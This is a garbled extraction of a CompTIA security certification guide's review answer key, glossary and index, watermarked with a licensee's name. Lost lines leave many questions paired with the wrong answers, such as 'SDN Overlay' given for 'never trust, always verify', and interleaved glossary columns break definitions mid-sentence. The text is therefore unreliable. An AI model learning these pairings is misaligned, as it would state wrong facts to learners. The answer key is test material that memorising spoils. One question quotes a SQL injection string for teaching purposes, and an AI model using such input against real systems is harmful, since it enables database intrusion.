CompTIA Certification
1
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-2 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-3
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-4 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-5
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-6 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-7
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-8 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-9
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-10 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-11
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-12 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-13
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-14 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-15
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-16 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-17
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-18 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-19
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-20 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-21
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
A-22 | Appendix A
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A | A-23
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Solutions
Review Activity: Risk Management
1. What are two ways to measure risk?
Acceptance
Likelihood
2. This phase of the risk management life cycle identifies effective means by which identified risks
can be reduced.
Control
Process
4. This function of the NIST CSF defines capabilities needed for the timely discovery of security
incidents.
Detect
SaaS
2. This describes when a customer is completely dependent on a vendor for products or services.
Vendor lock-in
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
S-2 | Solutions
3. This describes when a copy of vendor-developed source code is provided to a trusted third party,
in case of disaster.
4. This describes all of the suppliers, vendors, and partners needed to deliver a final product.
5. A set of cybersecurity standards developed by the United States Department of Defense (DoD)
and designed to help fortify the DoD supply chain.
CMMC
False
2. Which type of data can be used to identify an individual and includes information about past,
present, or future health?
3. Which type of data describes intangible products of human thought and ingenuity?
4. Which data destruction method is focused on the sanitization of the key used to perform
decryption of data?
Crypto erase
5. Which concept identifies that the laws governing the country in which data is stored have
control over the data?
Data sovereignty
NIST
3. What regulation enforces rules for organizations that offer services to entities in the European
Union (EU) or that collect and/or analyze data on subject located there?
GDPR
COPPA
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Solutions | S-3
5. Which process is designed to provide assurance that information systems are compliant with
federal standards?
Jurisdiction
Due care
3. This describes when an organization’s legal team receives notification instructing them to
preserve electronically stored information.
Legal hold
4. What type of agreement is often described as an “umbrella” contract that establishes the
agreement between two entities to conduct business?
5. Which agreement governs services that are both measurable and repeatable and also generally
include enforcement mechanisms that result in financial penalties for non-compliance?
Maintenance
3. NIST defines this as “An analysis of an information system’s requirements, functions, and
interdependencies used to characterize system contingency requirements and priorities in the
event of a significant disruption.”
4. This generally defines the amount of data that can be lost without irreparable harm to the
operation of the business.
5. Which type of assessment seeks to identify specific types of sensitive data so that its use and
handling can be properly disclosed?
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
S-4 | Solutions
Cold Site
3. This type of site is one that can be activated and used within minutes.
Hot Site
4. This term describes when cloud service offerings are used for DR capabilities.
DRaaS, DR as a Service
5. True or False. Incident response should only involve the information technology department.
False
False
2. True or False. BCDR plans should not be tested as doing so may break production systems.
False
3. Which type of simulation test includes a meeting to review the plans and analyze their
effectiveness against various BCDR scenarios?
Walk-through
4. Which type of simulation test is used to determine whether all parties involved in the response
know what to do and how to work together to complete the exercise?
Tabletop Exercise
5. When performing this type of test, issues and/or mistakes could cause a true DR situation:
Full Interruption
Answers will vary but should include a description of hiding data/activities and geographic location.
3. Describe a solution designed to validate the health of an endpoint prior to allowing access.
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Solutions | S-5
4. This is a passive technology used to provide visibility into network traffic within a switch.
Version 3
Guest
2. This describes a specially configured, highly hardened, and closely monitored system used to
perform administrative tasks.
Jump Box
3. This type of network segmentation differs from a traditional network segmentation approach
as it provides much higher levels of security, granularity, and flexibility.
Microsegmentation
4. What type of architecture adopts the approach of “never trust, always verify”?
SDN Overlay
Scaling vertically
3. What design strategy often conflicts with information technology management approaches that
look to consolidate platforms and reduce product portfolios?
Heterogeneity/Diversity
4. Which type of virtualization allows the client to either access an application hosted on a server
or stream the application from the server to the client for local processing?
Application Virtualization
5. This VM exploit gives an attacker access to the underlying host operating systems and thereby
access to all other VMs running on that host machine.
VM Escape
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
S-6 | Solutions
OWASP
2. What are some of the functions that can be performed via a Container API?
Some examples include list logs generated by an instance; issue commands to the running container; create,
update, and delete containers; and list capabilities.
3. What environment is used to merge code from multiple developers to a single master copy and
subject it to unit and functional tests?
4. Which type of application testing is frequently performed using scanning tools such as OWASP’s
Zed Attack Proxy (ZAP)?
False
2. Which type of software testing ensures that a particular block of code performs the exact action
intended and provides the exact output expected?
Unit Testing
3. Which type of testing verifies that individual components of a system are tested together to
ensure that they interact as expected?
Integration Testing
4. What development model includes phases that cascade with each phase starting only when all
tasks identified in the previous phase are complete?
Waterfall
5. What development model incorporates Security as Code (SaC) and Infrastructure as Code (IaC)?
SecDevOps
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Solutions | S-7
Reversible Encryption
2. What is the term used to describe when credentials created and stored at an external provider
are trusted for identification and authentication?
Federation
3. Which access control model is a modern, fine-grained type of access control that uses a type of
markup language call XACML?
4. What authentication protocol is comparable to RADIUS and associated with Cisco devices?
TACACS+
5. What authentication scheme uses an HMAC built from a shared secret plus a value derived from
a device and server’s local timestamps?
Use
Answers will vary but should include descriptions of data inventory, data mapping, backups, quality
assurance, and integrity controls.
Blocking use of external media, print blocking, Remote Desktop Protocol (RDP) blocking, clipboard privacy
controls, restricted virtual desktop infrastructure (VDI) implementation, data classification blocking.
4. What is the name of the data obfuscation method that replaces sensitive data with an
irreversible value?
Tokenization
Anonymization
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
S-8 | Solutions
Containerization
2. _____________________________ is assigned to cloud resources through the use of tags and is frequently
exploited to expose configuration parameters which may reveal misconfigured settings.
Metadata
3. Which type of cloud service model can be described as virtual machines and software running
on a shared platform to save costs and provide the highest level of flexibility?
Multi-tenant
4. After powering-up a virtual machine after performing maintenance, the virtual machine is no
longer accessible by applications previously configured to connect to it. What is a possible cause
of this issue?
5. Which type of storage model supports large amounts of unstructured data and is commonly
used to store archives and backup sets?
Blob Storage
Blockchain
Augmented/Virtual
3. This term describes computer-generated images or video of a person that appear to be real but
are instead completely synthetic and artificially generated.
Deep Fake
Quantum
5. Which technology allows the crafting of components on-demand, and potentially eliminates the
need to share designs or plans that may lead to intellectual property theft?
3D printing
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Solutions | S-9
WPA3 (Wi-Fi 6)
3. Which type of device attack allows complete control of a device without the target device being
paired with the attacker?
BlueBorne
4. Identify some reasons why DoH poses a security threat in an enterprise setting.
Answers may vary. DoH, if approved, must be configured to use a trusted provider. DoH encapsulates DNS
traffic within https traffic making it harder to identify. DoH can bypass external DNS query restrictions
configured on firewalls.
Answers may vary. Bluetooth devices are discoverable using freely available tools, meaning an attacker can
locate out-of-sight devices and also collect information about the hardware and vendor.
Responses will vary but should include a description regarding the lack of vendor support and
vendor-supplied security patches.
2. True or False. Operating System instances running in the cloud are patched automatically by the
cloud provider.
False
3. Which types of attacks on the Android OS can bypass the protections of mandatory access
control?
4. Which control is designed to prevent a computer from being hijacked by a malicious OS?
Answers may vary but secure boot, measured boot, or attestation services all apply.
5. Which type of host protection should provide capabilities that directly align to the NIST
Cybersecurity Framework Core?
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
S-10 | Solutions
False
2. What name is given to the practice of splitting encrypted data outputs into multiple parts which
are subsequently stored in disparate storage locations?
3. Which cloud computing practice eliminates the use of traditional virtual machines to deliver
cloud services?
Serverless Computing
4. What is a critical component dictating the implementation of logging capabilities in the cloud?
Misconfiguration
2. Which type of industrial computer is typically used to enable automation in assembly lines and
is programmed using ladder language?
3. Which type of availability attack are industrial computers most sensitive to?
4. An ________ ________ describes the method by which ICS are isolated from other networked
systems.
Air Gap
Answers will vary, but essentially because ICS control systems that interact with the real world and can cause
humanitarian and/or environmental disasters when breached or attacked.
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Solutions | S-11
Kekkack
2. Which MAC method is commonly paired with Salsa20 on hardware that does not have integrated
AES support?
Poly1305
Answers will vary. Should identify that it is associated with symmetric encryption and that sharing the key
between two parties can be risky if not performed carefully.
Stream
Answers will vary. Modes of operation are like “techniques” used to make symmetric block ciphers operate in
a way that is comparable to stream ciphers.
Key distribution
2. What is the bulk encryption method used in the following cipher suite?
ECDHE-RSA-AES128-GCM-SHA256
AES
4. What issue related to the use of authentication header (AH) makes it difficult/problematic to
implement?
5. Which implementation of Elliptic Curve Cryptography (ECC) is no longer recommended for use
by the NSA?
P256
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
S-12 | Solutions
2. Which of the following would be best suited to protecting data stored on a removable disk:
IPSec, TLS or AES?
AES is a symmetric block cipher and best suited to this. IPSec and TLS are associated with transport
encryption.
3. Which device used to provide strong authentication stores a user’s digital certificate, private
key associated with the certificate, and a personal identification number (PIN)?
Smart card
Answers will vary. A description of using device certificates to identify authorized endpoints is appropriate.
Answers will vary. A bridge CA allows the interoperability and shared trust between multiple, otherwise
independent, PKIs. Bridge CAs enable cross-certification.
Certificate Authority
2. True or False. A website protected with a valid digital certificate is guaranteed to be safe.
False. The digital certificate provides assurance that the site is genuine, but it could still be rogue in nature.
3. What is another term to describe the requirement for both client and server devices to use
certificates to verify identity?
Mutual authentication
4. What is the name of the response header configured on a web server to notify a browser to
connect to the requested website using HTTPS only?
5. The error message “your connection is not private” is displayed when accessing a known
website. What is a possible cause of this error?
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Solutions | S-13
Threat emulation
2. Which defensive approach describes a team of specialists working with the viewpoint of
“assume breach”?
Threat Hunting
3. Which threat actor group includes adversaries such as Anonymous, WikiLeaks, or LulzSec?
Hacktivists
4. Developed by Lockheed Martin, this describes the steps/actions an adversary must complete in
order to achieve their goals.
5. True or False. CPE is a list of records where each item contains a unique identifier used to
describe publicly known vulnerabilities.
CPE uses a syntax similar to Uniform Resource Identifiers (URI), CPE is a standardized naming format used to
identify systems and software.
Dynamic assessment
2. What testing method uses specialty software tools designed to identify problems and issues
with an application by purposely inputting/injecting malformed data to it?
3. This describes the actions of an attacker using one exploited system to access another within
the same organization.
Pivoting
An exploit framework
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
S-14 | Solutions
Decoy
2. Which type of deceptive technology is generally less complicated to deploy than other deceptive
technologies but can serve a similar purpose?
Simulator
Immutable
Hardening
5. In Linux, ________________ describe self-contained software applications which include all the
necessary components and libraries they need to be able to operate on an immutable system.
Flatpaks
TOCTOU
https://www.foo.com/products/jsessionid=8858PNRX949WM26378/?item=
bigscreen-tv
What is problematic with this?
The session ID is included in the URL, meaning that anyone with access to the jsessionid information could
perform an authentication bypass attack for the identified user.
3. Which approach describes how software can be analyzed for open-source components?
False. JSON is designed to leverage common web technologies as part of its operation.
5. What type of attack is most closely associated with the use of characters such as ’ OR ‘x’ = ‘x’ -- ?
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Solutions | S-15
False. A switch must be configured to mirror traffic or utilize a tap in order to provide full visibility for packet
capture. Switches natively isolate traffic.
2. Two alerts are generated by an IDS, one with a priority value of 1 and the other with a priority
value of 10. Which should be investigated first?
The one with a priority value of 1, which represents a more concerning event type.
3. Which security product is most likely to support the use of YARA rules?
Antivirus
4. In what ways does the support of security incidents differ from traditional tickets/requests
in IT?
Answers will vary. The answer should describe how security incidents must be handled based on severity
rather than order received.
Chain of custody
2. Which utility can be used to extract data from binary files and can display the contents in
hexadecimal, decimal, octal, or ASCII formats
hexdump
3. Which tool can be used to identify interactions between processes and the Linux kernel?
strace
volatility
5. Which command line utility is designed to display real-time information about system memory,
running processes, interrupts, paging, and I/O statistics?
vmstat
Solutions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Glossary
1
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
G-2 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Glossary | G-3
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
G-4 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Glossary | G-5
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
G-6 | Glossary
field programmable gate array (FPGA) both the integrity and authenticity of a
A processor that can be programmed to message by combining a cryptographic
perform a specific function by a customer hash of the message with a secret key.
rather than at the time of manufacture.
hashing Function that converts an
file inclusion A web application arbitrary length string input to a fixed
vulnerability that allows an attacker either length string output. A cryptographic hash
to download a file from an arbitrary function does this in a way that reduces
location on the host file system or to the chance of collisions, where two
upload an executable or script file to open different inputs produce the same output.
a backdoor.
heating, ventilation, air conditioning
file integrity monitoring (FIM) A type (HVAC) Control systems that maintain an
of software that reviews system files to optimum heating, cooling, and humidity
ensure that they have not been tampered level working environment for different
with. parts of the building.
firewall Software or hardware device that HMAC-based one-time password
protects a system or network by blocking (HOTP) An algorithm that generates
unwanted network traffic. a one-time password using a hash-
based authentication code to verify the
gap analysis An analysis that measures
authenticity of the message.
the difference between current state and
desired state in order to help assess the homomorphic encryption Method that
scope of work included in a project. allows computation of certain fields in a
dataset without decrypting it.
geofencing Security control that can
enforce a virtual boundary based on real- host-based firewall A software
world geography. application running on a single host and
designed to protect only that host.
geotagging Adding geographical
information to files, such as latitude and host-based intrusion detection system
longitude coordinates as well as date (HIDS) A type of IDS that monitors
and time. a computer system for unexpected
behavior or drastic changes to the
hacktivist A threat actor that is motivated
systemʼs state.
by a social issue or political cause.
hot site Fully configured alternate
hardening Process of making a host or
processing site that can be brought online
app configuration secure by reducing
either instantly or very quickly after a
its attack surface, through running only
disaster.
necessary services, installing monitoring
software to protect against malware human-machine interface (HMI) Input
and intrusions, and establishing a and output controls on a PLC to allow a
maintenance schedule to ensure the user to configure and monitor the system.
system is patched to be secure against
IEEE 802.1X Standard for encapsulating
software exploits.
EAP communications over a LAN (EAPoL)
hardware root of trust (RoT) A to implement port-based authentication.
cryptographic module embedded within
impact The severity of the risk if realized
a computer system that can endorse
by factors such as the scope, value of
trusted execution and attest to boot
the asset, or the financial impacts of the
settings and metrics.
event.
hardware security module (HSM) An
in-band authentication Use of a
appliance for generating and storing
communication channel that is the same
cryptographic keys. This sort of solution
as the one currently being used.
may be less susceptible to tampering
and insider threats than software-based incident response plan (IRP) Specific
storage. procedures that must be performed if
a certain type of event is detected or
hash-based message authentication
reported.
code (HMAC) A method used to verify
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Glossary | G-7
indicator of compromise (IoC) A sign Internet of Things (IoT) Devices that can
that an asset or network has been report state and configuration data and
attacked or is currently under attack. be remotely managed over IP networks.
industrial control system (ICS) Network Internet Protocol Security (IPSec)
managing embedded devices (computer Network protocol suite used to secure
systems that are designed to perform a data through authentication and
specific, dedicated function). encryption as the data travels across the
network or the Internet.
information systems security officer
(ISSO) Organizational role with technical intrusion detection system (IDS)
responsibilities for implementation Security appliance or software that uses
of security policies, frameworks, and passive hardware sensors to monitor
controls. traffic on a specific segment of the
network.
infrastructure as a service (IaaS) Cloud
service model that provisions virtual IP flow information export (IPFIX)
machines and network infrastructure. Standards-based version of the Netflow
framework.
infrastructure as code (IaC) Provisioning
architecture in which deployment of job rotation The policy of preventing any
resources is performed by scripted one individual performing the same role
automation and orchestration. or tasks for too long. This deters fraud
and provides better oversight of the
initialization vector (IV) A technique
personʼs duties.
used in cryptography to generate random
numbers to be used along with a secret JSON web token A compact and
key to provide data encryption. self-contained method for securely
transmitting messages.
initialization vector attack (IV attack)
A wireless attack where the attacker Kerberos Single sign-on authentication
is able to predict or control the IV of and authorization service that is based on
an encryption process, thus giving the a time-sensitive ticket-granting system.
attacker access to view the encrypted
key distribution center (KDC)
data that is supposed to be hidden from
Component of Kerberos that authenticates
everyone else except the user or network.
users and issues tickets (tokens).
insider threat A type of threat actor who
key performance indicator (KPI) A
is assigned privileges on the system that
formal mechanism designed to measure
cause an intentional or unintentional
performance of a program against
incident.
desired goals.
integration test Individual components
key risk indicator (KRI) The method
of a system are tested together to ensure
by which emerging risks are identified
that they interact as expected.
and analyzed so that changes can be
intellectual property (IP) Data that is adopted to proactively avoid issues from
of commercial value and can be granted occuring.
rights of ownership, such as copyrights,
key signing key Used to sign the special
patents, and trademarks.
DNSKEY record which contains the (public)
International Organization for Zone Signing Key.
Standardization (ISO) Develops many
key stretching A technique that
standards and frameworks governing
strengthens potentially weak input for
the use of computers, networks, and
cryptographic key generation, such as
telecommunications, including ones for
passwords or passphrases created by
information security (27K series) and risk
people, against bruteforce attacks.
management (31K series).
LDAP injection An application attack
International Organization for
that targets web-based applications by
Standardization 31000 Series (ISO/IEC
fabricating LDAP statements that are
31K) A comprehensive set of standards
typically created by user input.
for enterprise risk management.
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
G-8 | Glossary
least privilege Basic principle of security labeled dataset where features have been
stating that something should be allocated manually identified but without further
the minimum necessary rights, privileges, explicit instructions.
or information to perform its role.
Mandatory Access Control (MAC) Access
legal hold A process designed to preserve control model where resources are
all relevant information when litigation is protected by inflexible, system defined
reasonably expected to occur. rules. Resources (objects) and users
(subjects) are allocated a clearance level
legislation Organizational security
(or label).
policies are (to some extent) driven by
legislation introduced as a response to mandatory vacations The principle that
the growing appreciation of the threat states when and how long an employee
posed by computer crime. Legislation must take time off from work so that their
can cover many aspects of security policy activities may be subjected to a security
but the key concepts are due diligence review.
(demonstrating awareness of security
mean time between failures (MTBF)
issues) and due care (demonstrating
Metric for a device or component that
responses to identified threats). Security
predicts the expected time between
policy is also driven by adherence to
failures.
industry codes of practice and standards.
mean time to repair/replace/recover
lessons learned report (LLR) An analysis
(MTTR) Metric representing average time
of events that can provide insight into
taken for a device or component to be
how to improve response processes in the
repaired, replaced, or otherwise recover
future.
from a failure.
Lightweight Directory Access Protocol
measured boot A UEFI feature that
(LDAP) Network protocol used to access
gathers secure metrics to validate the
network directory databases, which store
boot process in an attestation report.
information about authorized users
and their privileges, as well as other meeting client requirements Formally
organizational information. defining what functionality is required of
a product or service, and taking steps to
Lightweight Directory Access
verify that a vendorʼs service or product
Protocol Secure (LDAPS) A method
provides at least this level of functionality.
of implementing LDAP using SSL/TLS
encryption. Message Authentication Code (MAC)
Proving the integrity and authenticity of
likelihood In risk calculation, the chance
a message by combining its hash with a
of a threat being realized, expressed as a
shared secret.
percentage.
Message Digest Algorithm v5 (MD5) A
load balancer Type of switch, router, or
cryptographic hash function producing a
software that distributes client requests
128-bit output.
between different resources, such as
communications links or similarly- microservices A software architecture
configured servers. This provides fault where components of the solution are
tolerance and improves throughput. conceived as highly decoupled services
not dependent on a single platform type
logs OS and applications software can be
or technology.
configured to log events automatically.
This provides valuable troubleshooting Multi-purpose Internet Mail Extensions
information. Security logs provide an audit (MIME) A protocol specifying Internet mail
trail of actions performed on the system message formats and attachments.
as well as warning of suspicious activity.
modbus A communications protocol used
It is important that log configuration and
in operational technology networks.
files be made tamper-proof.
ModSecurity An open source (sponsored
machine learning (ML) A component
by Trustwave) Web Application Firewall
of AI that enables a machine to develop
(WAF) for Apache, nginx, and IIS.
strategies for solving a task given a
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Glossary | G-9
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
G-10 | Glossary
filtering of network traffic as well as block public cloud A cloud that is deployed
processes at the application level. for shared use by multiple independent
tenants.
personal identifiable financial
information (PIFI) Personal information public key During asymmetric encryption,
about a consumer provided to a financial this key is freely distributed and can be
institution that can include account used to perform the reverse encryption or
number, credit/debit card number, decryption operation of the linked private
name, social security number and other key in the pair.
information.
public key infrastructure (PKI)
pinning A deprecated method of trusting Framework of certificate authorities,
digital certificates that bypasses the CA digital certificates, software, services,
hierarchy and chain of trust to minimize and other cryptographic components
man-in-the-middle attacks. deployed for the purpose of validating
subject identities.
platform as a service (PaaS) Cloud
service model that provisions application quality assurance (QA) Policies,
and database services as a platform for procedures, and tools designed to ensure
development of apps. defect-free development and delivery.
private cloud A cloud that is deployed for rate limiting An approach that protects
use by a single entity. the attack from consuming all available
bandwidth and impacting other servers
private key In asymmetric encryption, the
and services on the network. It reduces
private key is known only to the holder
the amount of throughput available to the
and is linked to, but not derivable from,
server or service being attacked.
a public key distributed to those with
which the holder wants to communicate redundant array of independent/
securely. A private key can be used to inexpensive disks (RAID) Specifications
encrypt data that can be decrypted by the that support redundancy and fault
linked public key or vice versa. tolerance for different configurations of
multiple-device storage systems.
privileged access management (PAM)
Policies, procedures, and support software regression testing The process of testing
for managing accounts and credentials an application after changes are made
with administrative permissions. to see if these changes have triggered
problems in older areas of code.
production An IT environment available
to consumer for normal, day-to-day use. reliability The fundamental security
goal of ensuring that an information
Protected Extensible Authentication
processing system is trustworthy.
Protocol (PEAP) EAP implementation that
uses a server-side certificate to create Remote Authentication Dial-in
a secure tunnel for user authentication, User Service (RADIUS) AAA protocol
referred to as the inner method. used to manage remote and wireless
authentication infrastructures.
protected health information (PHI)
Data that can be used to identify an remote code execution (RCE) A
individual and includes information about vulnerability that allows an attacker to
past, present, or future health, as well as transmit code from a remote host for
related payments and data used in the execution on a target host or a module
operation of a healthcare business. that exploits such a vulnerability.
protocol analysis Analysis of per- remote wipe Software that allows
protocol utilization statistics in a packet deletion of data and settings on a mobile
capture or network traffic sampling. device to be initiated from a remote
server.
provisioning The process of deploying
an application to the target environment, representation state transfer (REST)
such as enterprise desktops, mobile A standardized, stateless architectural
devices, or cloud infrastructure. style used by web applications for
communication and integration.
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Glossary | G-11
residual risk Risk that remains even after or restrictions to enforce a least privileges
controls are put into place. permissions policy.
Resource Record Set (RRset) All resource sandbox A computing environment that is
records for a domain that have the same isolated from a host system to guarantee
type. that the environment runs in a controlled,
secure fashion. Communication links
return on investment (ROI) A metric to
between the sandbox and the host are
calculate whether an asset is worth the
usually completely prohibited.
cost of deploying and maintaining it.
scalability Property by which a
risk Likelihood and impact (or
computing environment is able to
consequence) of a threat actor exercising
gracefully fulfill its ever-increasing
a vulnerability.
resource needs.
risk acceptance The response of
script kiddie An inexperienced, unskilled
determining that a risk is within
attacker that typically uses tools or scripts
the organizationʼs appetite and no
created by others.
countermeasures other than ongoing
monitoring is needed. secure boot A UEFI feature that prevents
unwanted processes from executing
risk appetite A strategic assessment of
during the boot operation.
what level of residual risk is tolerable for
an organization. secure hash algorithm (SHA) A
cryptographic hashing algorithm created
risk avoidance In risk mitigation, the
to address possible weaknesses in MDA.
practice of ceasing activity that presents
The current version is SHA-2.
risk.
secure multi-party computation (MPC)
risk management The cyclical process
Calculations performed by more than
of identifying, assessing, analyzing, and
one system whereby the function used to
responding to risks.
perform the calculations is only known by
risk mitigation The response of reducing a single party.
risk to fit within an organizationʼs risk
secure/multipurpose internet mail
appetite.
extensions (S/MIME) An email encryption
risk tolerance Determines the thresholds standard that adds digital signatures and
that separate different levels of risk. public key cryptography to traditional
MIME communications.
risk transference In risk mitigation,
the response of moving or sharing the security assertion markup language
responsibility of risk to another entity, (SAML) An XML-based data format used
such as by purchasing cybersecurity to exchange authentication information
insurance. between a client and a service.
rogue access point Wireless access point security information and event
that has been enabled on the network management (SIEM) Solution that
without authorization. provides real-time or near-real-time
analysis of security alerts generated by
role-based access control (RBAC)
network hardware and applications.
Access control model where resources
are protected by ACLs that are managed security orchestration, automation,
by administrators and that provide user and response (SOAR) A class of security
permissions based on job functions. tools that facilitates incident response,
threat hunting, and security configuration
router An intermediate system working at
by orchestrating automated runbooks
the Network layer capable of forwarding
and delivering data enrichment.
packets around logical networks of
different layer 1 and layer 2 types. security, trust, assurace and risk (STAR)
rule-based access control A non- A framework of security best practices for
Cloud service providers that is developed
discretionary access control technique
and maintained by the Cloud Security
that is based on a set of operational rules
Alliance (CSA).
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
G-12 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Glossary | G-13
state actor A type of threat actor that place and designed to protect technology
is supported by the resources of its host and financial operations.
countryʼs military and security services.
tcpdump command Command-line
static code analysis The process of packet sniffing utility.
reviewing uncompiled source code either
Terminal Access Controller Access
manually or using automated tools.
Control System Plus (TACACS+) AAA
stream cipher A type of symmetric protocol developed by Cisco that is often
encryption that combines a stream used to authenticate to administrator
of plaintext bits or bytes with a accounts for network appliance
pseudorandom stream initialized by a management.
secret key.
test access port (TAP) Hardware device
Structured Query Language injection inserted into a cable to copy frames for
(SQL injection) An attack that injects analysis.
a database query into the input data
tethering Using the cellular data plan of
directed at a server by accessing the client
a mobile device to provide Internet access
side of the application.
to a laptop or PC. The PC can be tethered
subject alternative name (SAN) Field to the mobile by USB, Bluetooth, or Wi-Fi
in a digital certificate allowing a host to (a mobile hotspot).
be identifed by multiple host names/
time to live (DNS) (TTL) Amount of time
subdomains.
that the record returned by a DNS query
Supervisory Control and Data should be cached before discarding it.
Acquisition (SCADA) Type of industrial
time-based one-time password (TOTP)
control system that manages large-scale,
An improvement on HOTP that forces
multiple-site devices and equipment
one-time passwords to expire after a
spread over geographically large areas
short period of time.
from a host computer.
tradeoff analysis Comparing potential
supplicant In EAP architecture, the device
benefits to potential risks and
requesting access to the network.
determining a course of action based on
supply chain The end-to-end process of adjusting factors that contribute to each
supplying, manufacturing, distributing, area.
and finally releasing goods and services to
transparent proxy A server that redirects
a customer.
requests and responses without the client
supply chain visibility (SCV) The capacity being explicitly configured to use it. Also
to understand how all vender hardware, referred to as a forced or intercepting
software, and services are produced and proxy.
delivered as well as how they impact an
true negative In security scanning, a case
organizationʼs operations or finished
that is not reported when it should not be.
products.
true positive In security scanning, a case
support availability Verifying the type
that is reported when it should be.
and level of support to be provided by
the vendor in support of their product or trust model In PKI, a description of
service. how users and different CAs exchange
information and certificates.
switched port analyzer (SPAN) Copying
ingress and/or egress communications trusted platform module (TPM) A
from one or more switch ports to specification for hardware-based storage
another port. This is used to monitor of digital certificates, keys, hashed
communications passing over the switch. passwords, and other user and platform
identification information.
system and organization controls
(SOC) Use of standards established by Tttal cost of ownership (TCO) Associated
the American Institute of Certified Public costs of an asset including acquisition
Accountants (AICPA) to evaluate the costs and costs to maintain and safely
policies, processes, and procedures in operate the asset over its entire lifespan.
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
G-14 | Glossary
Glossary
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index
Page numbers with Italics represent charts, graphs, and diagrams.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
I-2 | Index
Index
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Index | I-3
Single Sign-On (SSO), 124 blob storage, 150 mission critical services,
Terminal Access Controller block action, for data, 134–135 identifying, 49
Access-Control System Plus block cipher, 211–212, G-2 privacy impact assessment,
(TACACS+), 125 block lists, 280 51
authenticator, G-1 block storage, 150 recovery objectives, 50–51
